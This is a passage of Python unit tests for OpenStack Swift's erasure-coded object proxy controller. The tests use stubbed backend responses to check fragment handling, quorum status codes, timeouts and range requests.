StubResponse(416, frag_index=7),
StubResponse(416, frag_index=8),
]
def get_response(req):
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o', headers={
'Range': 'bytes=%s-' % 100000000000000})
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
# TODO: does 416 make sense without a quorum, or should this be a 404?
# a non-range GET of same object would return 404
self.assertEqual(resp.status_int, 416)
self.assertEqual(len(log), 2 * self.replicas())
def test_GET_with_success_and_507_will_503(self):
responses = [ # only 9 good nodes
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
]
def get_response(req):
# bad disk on all other nodes
return responses.pop(0) if responses else StubResponse(507)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
self.assertEqual(len(log), 2 * self.replicas())
def test_GET_with_success_and_404_will_404(self):
responses = [ # only 9 good nodes
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
]
def get_response(req):
# no frags on other nodes
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
self.assertEqual(len(log), 2 * self.replicas())
def test_GET_mixed_ranged_responses_success(self):
segment_size = self.policy.ec_segment_size
frag_size = self.policy.fragment_size
new_data = ('test' * segment_size)[:-492]
new_etag = md5(new_data).hexdigest()
new_archives = self._make_ec_archive_bodies(new_data)
old_data = ('junk' * segment_size)[:-492]
old_etag = md5(old_data).hexdigest()
old_archives = self._make_ec_archive_bodies(old_data)
frag_archive_size = len(new_archives[0])
# here we deliberately omit X-Backend-Data-Timestamp to check that
# proxy will tolerate responses from object server that have not been
# upgraded to send that header
old_headers = {
'Content-Type': 'text/plain',
'Content-Length': frag_size,
'Content-Range': 'bytes 0-%s/%s' % (frag_size - 1,
frag_archive_size),
'X-Object-Sysmeta-Ec-Content-Length': len(old_data),
'X-Object-Sysmeta-Ec-Etag': old_etag,
'X-Backend-Timestamp': Timestamp(self._ts_iter.next()).internal
}
new_headers = {
'Content-Type': 'text/plain',
'Content-Length': frag_size,
'Content-Range': 'bytes 0-%s/%s' % (frag_size - 1,
frag_archive_size),
'X-Object-Sysmeta-Ec-Content-Length': len(new_data),
'X-Object-Sysmeta-Ec-Etag': new_etag,
'X-Backend-Timestamp': Timestamp(self._ts_iter.next()).internal
}
# 7 primaries with stale frags, 3 handoffs failed to get new frags
responses = [
StubResponse(206, old_archives[0][:frag_size], old_headers, 0),
StubResponse(206, new_archives[1][:frag_size], new_headers, 1),
StubResponse(206, old_archives[2][:frag_size], old_headers, 2),
StubResponse(206, new_archives[3][:frag_size], new_headers, 3),
StubResponse(206, old_archives[4][:frag_size], old_headers, 4),
StubResponse(206, new_archives[5][:frag_size], new_headers, 5),
StubResponse(206, old_archives[6][:frag_size], old_headers, 6),
StubResponse(206, new_archives[7][:frag_size], new_headers, 7),
StubResponse(206, old_archives[8][:frag_size], old_headers, 8),
StubResponse(206, new_archives[9][:frag_size], new_headers, 9),
StubResponse(206, old_archives[10][:frag_size], old_headers, 10),
StubResponse(206, new_archives[11][:frag_size], new_headers, 11),
StubResponse(206, old_archives[12][:frag_size], old_headers, 12),
StubResponse(206, new_archives[13][:frag_size], new_headers, 13),
StubResponse(206, new_archives[0][:frag_size], new_headers, 0),
StubResponse(404),
StubResponse(404),
StubResponse(206, new_archives[6][:frag_size], new_headers, 6),
StubResponse(404),
StubResponse(206, new_archives[10][:frag_size], new_headers, 10),
StubResponse(206, new_archives[12][:frag_size], new_headers, 12),
]
def get_response(req):
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, new_data[:segment_size])
self.assertEqual(len(log), self.policy.ec_ndata + 10)
def test_GET_mismatched_fragment_archives(self):
segment_size = self.policy.ec_segment_size
test_data1 = ('test' * segment_size)[:-333]
# N.B. the object data *length* here is different
test_data2 = ('blah1' * segment_size)[:-333]
etag1 = md5(test_data1).hexdigest()
etag2 = md5(test_data2).hexdigest()
ec_archive_bodies1 = self._make_ec_archive_bodies(test_data1)
ec_archive_bodies2 = self._make_ec_archive_bodies(test_data2)
headers1 = {'X-Object-Sysmeta-Ec-Etag': etag1,
'X-Object-Sysmeta-Ec-Content-Length': '333'}
# here we're going to *lie* and say the etag here matches
headers2 = {'X-Object-Sysmeta-Ec-Etag': etag1,
'X-Object-Sysmeta-Ec-Content-Length': '333'}
responses1 = [(200, body, self._add_frag_index(fi, headers1))
for fi, body in enumerate(ec_archive_bodies1)]
responses2 = [(200, body, self._add_frag_index(fi, headers2))
for fi, body in enumerate(ec_archive_bodies2)]
req = swob.Request.blank('/v1/a/c/o')
# sanity check responses1
responses = responses1[:self.policy.ec_ndata]
status_codes, body_iter, headers = zip(*responses)
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(md5(resp.body).hexdigest(), etag1)
# sanity check responses2
responses = responses2[:self.policy.ec_ndata]
status_codes, body_iter, headers = zip(*responses)
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(md5(resp.body).hexdigest(), etag2)
# now mix the responses a bit
mix_index = random.randint(0, self.policy.ec_ndata - 1)
mixed_responses = responses1[:self.policy.ec_ndata]
mixed_responses[mix_index] = responses2[mix_index]
status_codes, body_iter, headers = zip(*mixed_responses)
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
try:
resp.body
except ECDriverError:
resp._app_iter.close()
else:
self.fail('invalid ec fragment response body did not blow up!')
error_lines = self.logger.get_lines_for_level('error')
self.assertEqual(1, len(error_lines))
msg = error_lines[0]
self.assertIn('Error decoding fragments', msg)
self.assertIn('/a/c/o', msg)
log_msg_args, log_msg_kwargs = self.logger.log_dict['error'][0]
self.assertEqual(log_msg_kwargs['exc_info'][0], ECDriverError)
def test_GET_read_timeout(self):
segment_size = self.policy.ec_segment_size
test_data = ('test' * segment_size)[:-333]
etag = md5(test_data).hexdigest()
ec_archive_bodies = self._make_ec_archive_bodies(test_data)
headers = {'X-Object-Sysmeta-Ec-Etag': etag}
self.app.recoverable_node_timeout = 0.01
responses = [
(200, SlowBody(body, 0.1), self._add_frag_index(i, headers))
for i, body in enumerate(ec_archive_bodies)
] * self.policy.ec_duplication_factor
req = swob.Request.blank('/v1/a/c/o')
status_codes, body_iter, headers = zip(*responses + [
(404, '', {}) for i in range(
self.policy.object_ring.max_more_nodes)])
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
# do this inside the fake http context manager, it'll try to
# resume but won't be able to give us all the right bytes
self.assertNotEqual(md5(resp.body).hexdigest(), etag)
error_lines = self.logger.get_lines_for_level('error')
self.assertEqual(self.replicas(), len(error_lines))
nparity = self.policy.ec_nparity
for line in error_lines[:nparity]:
self.assertIn('retrying', line)
for line in error_lines[nparity:]:
self.assertIn('ChunkReadTimeout (0.01s)', line)
def test_GET_read_timeout_resume(self):
segment_size = self.policy.ec_segment_size
test_data = ('test' * segment_size)[:-333]
etag = md5(test_data).hexdigest()
ec_archive_bodies = self._make_ec_archive_bodies(test_data)
headers = {'X-Object-Sysmeta-Ec-Etag': etag}
self.app.recoverable_node_timeout = 0.05
# first one is slow
responses = [(200, SlowBody(ec_archive_bodies[0], 0.1),
self._add_frag_index(0, headers))]
# ... the rest are fine
responses += [(200, body, self._add_frag_index(i, headers))
for i, body in enumerate(ec_archive_bodies[1:], start=1)]
req = swob.Request.blank('/v1/a/c/o')
status_codes, body_iter, headers = zip(
*responses[:self.policy.ec_ndata + 1])
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertTrue(md5(resp.body).hexdigest(), etag)
error_lines = self.logger.get_lines_for_level('error')
self.assertEqual(1, len(error_lines))
self.assertIn('retrying', error_lines[0])
def test_fix_response_HEAD(self):
headers = {'X-Object-Sysmeta-Ec-Content-Length': '10',
'X-Object-Sysmeta-Ec-Etag': 'foo'}
# sucsessful HEAD
responses = [(200, '', headers)]
status_codes, body_iter, headers = zip(*responses)
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD')
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, '')
# 200OK shows original object content length
self.assertEqual(resp.headers['Content-Length'], '10')
self.assertEqual(resp.headers['Etag'], 'foo')
# not found HEAD
responses = [(404, '', {})] * self.replicas() * 2
status_codes, body_iter, headers = zip(*responses)
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD')
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
# 404 shows actual response body size (i.e. 0 for HEAD)
self.assertEqual(resp.headers['Content-Length'], '0')
def test_PUT_with_slow_commits(self):
# It's important that this timeout be much less than the delay in
# the slow commit responses so that the slow commits are not waited
# for.
self.app.post_quorum_timeout = 0.01
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
# plenty of slow commits
response_sleep = 5.0
codes = [FakeStatus(201, response_sleep=response_sleep)
for i in range(self.replicas())]
# swap out some with regular fast responses
number_of_fast_responses_needed_to_be_quick_enough = \
self.policy.quorum
fast_indexes = random.sample(
range(self.replicas()),
number_of_fast_responses_needed_to_be_quick_enough)
for i in fast_indexes:
codes[i] = 201
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
start = time.time()
resp = req.get_response(self.app)
response_time = time.time() - start
self.assertEqual(resp.status_int, 201)
self.assertLess(response_time, response_sleep)
def test_PUT_with_just_enough_durable_responses(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * (self.policy.ec_ndata + 1)
codes += [503] * (self.policy.ec_nparity - 1)
self.assertEqual(len(codes), self.policy.ec_n_unique_fragments)
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_with_less_durable_responses(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * (self.policy.ec_ndata)
codes += [503] * (self.policy.ec_nparity)
self.assertEqual(len(codes), self.policy.ec_n_unique_fragments)
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
def test_GET_with_invalid_ranges(self):
# real body size is segment_size - 10 (just 1 segment)
segment_size = self.policy.ec_segment_size
real_body = ('a' * segment_size)[:-10]
# range is out of real body but in segment size
self._test_invalid_ranges('GET', real_body,
segment_size, '%s-' % (segment_size - 10))
# range is out of both real body and segment size
self._test_invalid_ranges('GET', real_body,
segment_size, '%s-' % (segment_size + 10))
def _test_invalid_ranges(self, method, real_body, segment_size, req_range):
# make a request with range starts from more than real size.
body_etag = md5(real_body).hexdigest()
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method=method,
headers={'Destination': 'c1/o',
'Range': 'bytes=%s' % (req_range)})
fragments = self.policy.pyeclib_driver.encode(real_body)
fragment_payloads = [fragments * self.policy.ec_duplication_factor]
node_fragments = zip(*fragment_payloads)
self.assertEqual(len(node_fragments), self.replicas()) # sanity
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)),
'X-Object-Sysmeta-Ec-Etag': body_etag}
start = int(req_range.split('-')[0])
self.assertGreaterEqual(start, 0) # sanity
title, exp = swob.RESPONSE_REASONS[416]
range_not_satisfiable_body = \
'<html><h1>%s</h1><p>%s</p></html>' % (title, exp)
if start >= segment_size:
responses = [(416, range_not_satisfiable_body,
self._add_frag_index(i, headers))
for i in range(POLICIES.default.ec_ndata)]
else:
responses = [(200, ''.join(node_fragments[i]),
self._add_frag_index(i, headers))
for i in range(POLICIES.default.ec_ndata)]
status_codes, body_iter, headers = zip(*responses)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 416)
self.assertEqual(resp.content_length, len(range_not_satisfiable_body))
self.assertEqual(resp.body, range_not_satisfiable_body)
self.assertEqual(resp.etag, body_etag)
self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
class TestECFunctions(unittest.TestCase):
def test_chunk_transformer(self):
def do_test(dup_factor, segments):
segment_size = 1024
orig_chunks = []
for i in range(segments):
orig_chunks.append(chr(i + 97) * segment_size)
policy = ECStoragePolicy(0, 'ec8-2', ec_type=DEFAULT_TEST_EC_TYPE,
ec_ndata=8, ec_nparity=2,
object_ring=FakeRing(
replicas=10 * dup_factor),
ec_segment_size=segment_size,
ec_duplication_factor=dup_factor)
encoded_chunks = [[] for _ in range(policy.ec_n_unique_fragments)]
for orig_chunk in orig_chunks:
# each segment produces a set of frags
frag_set = policy.pyeclib_driver.encode(orig_chunk)
for frag_index, frag_data in enumerate(frag_set):
encoded_chunks[frag_index].append(frag_data)
# chunk_transformer buffers and concatenates multiple frags
expected = [''.join(frags) for frags in encoded_chunks]
transform = obj.chunk_transformer(policy)
transform.send(None)
backend_chunks = transform.send(''.join(orig_chunks))
self.assertIsNotNone(backend_chunks) # sanity
self.assertEqual(
len(backend_chunks), policy.ec_n_unique_fragments)
self.assertEqual(expected, backend_chunks)
# flush out last chunk buffer
backend_chunks = transform.send('')
self.assertEqual(
len(backend_chunks), policy.ec_n_unique_fragments)
self.assertEqual([''] * policy.ec_n_unique_fragments,
backend_chunks)
do_test(dup_factor=1, segments=1)
do_test(dup_factor=2, segments=1)
do_test(dup_factor=3, segments=1)
do_test(dup_factor=1, segments=2)
do_test(dup_factor=2, segments=2)
do_test(dup_factor=3, segments=2)
def test_chunk_transformer_non_aligned_last_chunk(self):
last_chunk = 'a' * 128
def do_test(dup):
policy = ECStoragePolicy(0, 'ec8-2', ec_type=DEFAULT_TEST_EC_TYPE,
ec_ndata=8, ec_nparity=2,
object_ring=FakeRing(replicas=10 * dup),
ec_segment_size=1024,
ec_duplication_factor=dup)
expected = policy.pyeclib_driver.encode(last_chunk)
transform = obj.chunk_transformer(policy)
transform.send(None)
transform.send(last_chunk)
# flush out last chunk buffer
backend_chunks = transform.send('')
self.assertEqual(
len(backend_chunks), policy.ec_n_unique_fragments)
self.assertEqual(expected, backend_chunks)
do_test(1)
do_test(2)
@patch_policies([ECStoragePolicy(0, name='ec', is_default=True,
ec_type=DEFAULT_TEST_EC_TYPE, ec_ndata=10,
ec_nparity=4, ec_segment_size=4096,
ec_duplication_factor=2),
StoragePolicy(1, name='unu')],
fake_ring_args=[{'replicas': 28}, {}])
class TestECDuplicationObjController(
ECObjectControllerMixin, unittest.TestCase):
container_info = {
'status': 200,
'read_acl': None,
'write_acl': None,
'sync_key': None,
'versions': None,
'storage_policy': '0',
}
controller_cls = obj.ECObjectController
def _test_GET_with_duplication_factor(self, node_frags, obj):
# This is basic tests in the healthy backends status
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# the backend requests should be >= num_data_fragments
self.assertGreaterEqual(len(log), self.policy.ec_ndata)
# but <= # of replicas
self.assertLessEqual(len(log), self.replicas())
self.assertEqual(len(collected_responses), 1)
etag, frags = collected_responses.items()[0]
# the backend requests will stop at enough ec_ndata responses
self.assertEqual(
len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (len(frags), etag))
# TODO: actually "frags" in node_frags is meaning "node_index" right now
# in following tests. Reconsidering the name and semantics change needed.
# Or, just mapping to be correct as frag_index is enough?.
def test_GET_with_duplication_factor(self):
obj = self._make_ec_object_stub()
node_frags = [
{'obj': obj, 'frag': 0},
{'obj': obj, 'frag': 1},
{'obj': obj, 'frag': 2},
{'obj': obj, 'frag': 3},
{'obj': obj, 'frag': 4},
{'obj': obj, 'frag': 5},
{'obj': obj, 'frag': 6},
{'obj': obj, 'frag': 7},
{'obj': obj, 'frag': 8},
{'obj': obj, 'frag': 9},
{'obj': obj, 'frag': 10},
{'obj': obj, 'frag': 11},
{'obj': obj, 'frag': 12},
{'obj': obj, 'frag': 13},
] * 2 # duplicated!
self._test_GET_with_duplication_factor(node_frags, obj)
def test_GET_with_duplication_factor_almost_duplicate_dispersion(self):
obj = self._make_ec_object_stub()
node_frags = [
# first half of # of replicas are 0, 1, 2, 3, 4, 5, 6
{'obj': obj, 'frag': 0},
{'obj': obj, 'frag': 0},
{'obj': obj, 'frag': 1},
{'obj': obj, 'frag': 1},
{'obj': obj, 'frag': 2},
{'obj': obj, 'frag': 2},
{'obj': obj, 'frag': 3},
{'obj': obj, 'frag': 3},
{'obj': obj, 'frag': 4},
{'obj': obj, 'frag': 4},
{'obj': obj, 'frag': 5},
{'obj': obj, 'frag': 5},
{'obj': obj, 'frag': 6},
{'obj': obj, 'frag': 6},
# second half of # of replicas are 7, 8, 9, 10, 11, 12, 13
{'obj': obj, 'frag': 7},
{'obj': obj, 'frag': 7},
{'obj': obj, 'frag': 8},
{'obj': obj, 'frag': 8},
{'obj': obj, 'frag': 9},
{'obj': obj, 'frag': 9},
{'obj': obj, 'frag': 10},
{'obj': obj, 'frag': 10},
{'obj': obj, 'frag': 11},
{'obj': obj, 'frag': 11},
{'obj': obj, 'frag': 12},
{'obj': obj, 'frag': 12},
{'obj': obj, 'frag': 13},
{'obj': obj, 'frag': 13},
]
# ...but it still works!
self._test_GET_with_duplication_factor(node_frags, obj)
def test_GET_with_missing_and_mixed_frags_will_dig_deep_but_stop(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
# both of obj1 and obj2 has only 9 frags which is not able to decode
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
]
# ... and the rests are 404s which is limited by request_count
# (2 * replicas in default) rather than max_extra_requests limitation
# because the retries will be in ResumingGetter if the responses
# are 404s
node_frags += [[]] * (self.replicas() * 2 - len(node_frags))
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# default node_iter will exhaust to the last of handoffs
self.assertEqual(len(log), self.replicas() * 2)
# we have obj1, obj2, and 404 NotFound in collected_responses
self.assertEqual(sorted([obj1['etag'], obj2['etag'], None]),
sorted(collected_responses.keys()))
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_many_missed_overwrite_will_need_handoff(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
# primaries
node_frags = [
{'obj': obj2, 'frag': 0},
{'obj': obj2, 'frag': 1},
{'obj': obj1, 'frag': 2}, # missed
{'obj': obj2, 'frag': 3},
{'obj': obj2, 'frag': 4},
{'obj': obj2, 'frag': 5},
{'obj': obj1, 'frag': 6}, # missed
{'obj': obj2, 'frag': 7},
{'obj': obj2, 'frag': 8},
{'obj': obj1, 'frag': 9}, # missed
{'obj': obj1, 'frag': 10}, # missed
{'obj': obj1, 'frag': 11}, # missed
{'obj': obj2, 'frag': 12},
{'obj': obj2, 'frag': 13},
]
node_frags = node_frags * 2 # 2 duplication
# so the primaries have indexes 0, 1, 3, 4, 5, 7, 8, 12, 13
# (9 indexes) for obj2 and then a handoff has index 6
node_frags += [
{'obj': obj2, 'frag': 6}, # handoff
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# there's not enough of the obj2 etag on the primaries, we would
# have collected responses for both etags, and would have made
# one more request to the handoff node
self.assertEqual(len(log), self.replicas() + 1)
self.assertEqual(len(collected_responses), 2)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_missing_and_mixed_frags_will_dig_deep_but_succeed(self):
obj1 = self._make_ec_object_stub(pattern='obj1',
timestamp=self.ts())
obj2 = self._make_ec_object_stub(pattern='obj2',
timestamp=self.ts())
# 28 nodes are here
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
[],
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
[],
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
[],
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
[],
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
[],
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
[],
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
[],
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
[],
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
[],
[],
]
node_frags += [[]] * 13 # Plus 13 nodes in handoff
# finally 10th fragment for obj2 found
node_frags += [[{'obj': obj2, 'frag': 9}]]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# we go exactly as long as we have to, finding two different
# etags and some 404's (i.e. collected_responses[None])
self.assertEqual(len(log), len(node_frags))
self.assertEqual(len(collected_responses), 3)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_mixed_frags_and_no_quorum_will_503(self):
# all nodes have a frag but there is no one set that reaches quorum,
# which means there is no backend 404 response, but proxy should still
# return 404 rather than 503
stub_objects = [
self._make_ec_object_stub(pattern='obj1'),
self._make_ec_object_stub(pattern='obj2'),
self._make_ec_object_stub(pattern='obj3'),
self._make_ec_object_stub(pattern='obj4'),
self._make_ec_object_stub(pattern='obj5'),
self._make_ec_object_stub(pattern='obj6'),
self._make_ec_object_stub(pattern='obj7'),
]
etags = collections.Counter(stub['etag'] for stub in stub_objects)
self.assertEqual(len(etags), 7, etags) # sanity
# primaries and handoffs for required nodes
# this is 10-4 * 2 case so that 56 requests (2 * replicas) required
# to give up. we prepares 7 different objects above so responses
# will have 8 fragments for each object
required_nodes = self.replicas() * 2
# fill them out to the primary and handoff nodes
node_frags = []
for frag in range(8):
for stub_obj in stub_objects:
if len(node_frags) >= required_nodes:
# we already have enough responses
break
node_frags.append({'obj': stub_obj, 'frag': frag})
# sanity
self.assertEqual(required_nodes, len(node_frags))
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
collected_etags = set()
collected_status = set()
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
collected_etags.add(etag)
collected_status.add(conn.resp.status)
self.assertEqual(required_nodes, len(log))
self.assertEqual(len(collected_etags), 7)
self.assertEqual({200}, collected_status)
def test_GET_with_no_durable_files(self):
# verify that at least one durable is necessary for a successful GET
obj1 = self._make_ec_object_stub()
node_frags = [
{'obj': obj1, 'frag': 0, 'durable': False},
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': False}, # parity
]
node_frags = node_frags * 2 # 2 duplications
node_frags += [[]] * self.replicas() # handoffs
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
# all 28 nodes tried with an optimistic get, none are durable and none
# report having a durable timestamp
self.assertEqual(self.replicas() * 2, len(log))
def test_GET_with_missing_and_mixed_frags_may_503(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
obj3 = self._make_ec_object_stub(pattern='obj3')
obj4 = self._make_ec_object_stub(pattern='obj4')
# we get a 503 when all the handoffs return 200
node_frags = [[]] * self.replicas() # primaries have no frags
# plus, 4 different objects and 7 indexes will b 28 node responses
# here for handoffs
node_frags = node_frags + [ # handoffs all have frags
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
{'obj': obj3, 'frag': 0},
{'obj': obj4, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
{'obj': obj3, 'frag': 1},
{'obj': obj4, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
{'obj': obj3, 'frag': 2},
{'obj': obj4, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
{'obj': obj3, 'frag': 3},
{'obj': obj4, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
{'obj': obj3, 'frag': 4},
{'obj': obj4, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
{'obj': obj3, 'frag': 5},
{'obj': obj4, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
{'obj': obj3, 'frag': 6},
{'obj': obj4, 'frag': 6},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
# never get a quorum so all nodes are searched
self.assertEqual(len(log), 2 * self.replicas())
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), 7)
def test_GET_with_mixed_etags_at_same_timestamp(self):
# the difference from parent class is only handoff stub length
ts = self.ts() # force equal timestamps for two objects
obj1 = self._make_ec_object_stub(timestamp=ts, pattern='obj1')
obj2 = self._make_ec_object_stub(timestamp=ts, pattern='obj2')
self.assertNotEqual(obj1['etag'], obj2['etag']) # sanity
node_frags = [
# 7 frags of obj2 are available and durable
{'obj': obj2, 'frag': 0, 'durable': True},
